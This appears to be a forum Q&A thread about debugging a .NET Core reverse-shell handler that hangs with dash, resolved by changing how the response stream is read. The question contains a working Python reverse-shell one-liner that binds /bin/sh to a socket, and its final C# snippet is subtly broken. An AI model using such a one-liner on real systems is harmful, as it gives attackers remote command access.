Bourne Shell EOL characters not working in shell handler
This may end up being a confusing question if you don't understand reverse shells but the tldr; is I'm trying to write a shell multihandler in .NET Core.
I have it handling bash, cmd, and powershell, shells just fine. However, when I try and handle a bourne shell, it connects just fine, but the shell seems to hang when I send it commands.
I believe the issue is not properly terminating the command with the right hex
Just for the POC this code splits out the Bourne Shell
if (ShellOsType == OsType.Linux && Prompt.Trim() == "$")
{
    writer.Write(command + "\n");
}
else
    writer.WriteLine(command); //if I use WriteLine for the bourne shell, the shell throws an error `: not found`
}

and the reverse shell is this command
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",13443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When I test this with netcat it works exactly how you'd expect. So the issue must be something to do with my .NET Core app and how it's handling it.
When I send a command
whoami\n
I'm expecting 2 lines in return
myusername
$
but I'm only getting one line in response
myusername
And if I go to where I created my reverse shell and hit CTRL+C it doesn't kill my shell but it does force it to send the second line to my handler.
What have I tried?
I've tried opening an ascii hex table and using everything up to the letters both before and after the \n in case I was missing something and nothing works but it does make it worse in some cases

You're likely not using the Bourne shell from 45 years ago, and in some cases it might be relevant to know which shell you are actually using. If you mean /bin/sh, different systems have different shells installed with that name. So the question is partly, which OS or Linux distribution are you running?

anyway, the error message looks a bit like what happens if you have a carriage return there at the end, before the newline. Though I would expect that to give problems with at least Bash, too. Anyway, check what WriteLine() actually prints as the line terminator, you likely don't want the CR there. Or, just use .Write(command + "\n") if it works?

@ilkkachu yes that's a valid point. I'm testing on /bin/sh on a ubuntu wsl v2 Linux version 4.4.0-22621-Microsoft (Microsoft@Microsoft.com) (gcc version 5.4.0 (GCC) ) #3672-Microsoft Fri Jan 01 08:00:00 PST 2016
WriteLine() is the one that returns the error. I'm able to reproduce it by sending \r\n which I suspect is the default for WriteLine. Write doesn't produce an error, it just hangs. I mainly just said bourne shell to distinguish between it and bash because bash is working as expected

sh on Ubuntu is the dash shell. I'm assuming it's the same on Ubuntu running in WSL.

@Dot, ugh, ok, I can't tell why it should just hang with the newline, but I'm not at all familiar with WSL, so I can't tell if there's some oddity related to it that might be at play here... What with line endings being a rather prominent difference between Win and others, I guess it wouldn't be surprising if there was something about it there? I might try with something other than a shell (e.g. cat -A or od -c) to perhaps see what actually gets transferred there, or even trace the shell if possible. But yeah, good luck.

Your shell isn't connected to a tty device so it won't act as an interactive shell. So no job control, no prompt, etc.

@ChrisDavies, well, the -i option should make it interactive, I think. Though I'm not sure if it still depends on the particular shell. With the /bin/sh (Bash 3.2) I have on the macbook, it works just fine with nc, and prints the prompt too.

It turns out the issue wasn't actually the command or line terminators it was the way stream reader was handling the response.
This is how I was handling the response
var stream = ShellTcpClient.GetStream();
lock (stream)
{
    var reader = new StreamReader(stream);

    var responseBuilder = new StringBuilder();
    string line;
    while ((line = reader.ReadLine()) != null)
    {
      //.. code to aggregate results
    }

When I get rid of trying to read the entire line with ReadLine() and instead just read it in by character, it works.

var stream = ShellTcpClient.GetStream();
lock (stream)
{
    var reader = new StreamReader(stream);

    var responseBuilder = new StringBuilder();
    char line;
    while ((line = reader.Read()) != null)
    {
      //.. code to aggregate results
    }


...which still might be about line terminators, if ReadLine() expects a CR+LF pair but only gets an LF from the remote :)

@ilkkachu yes that's true. You're probably correct to be honest. Maybe I'll breakout wireshark later and see what's actually going over the wire.
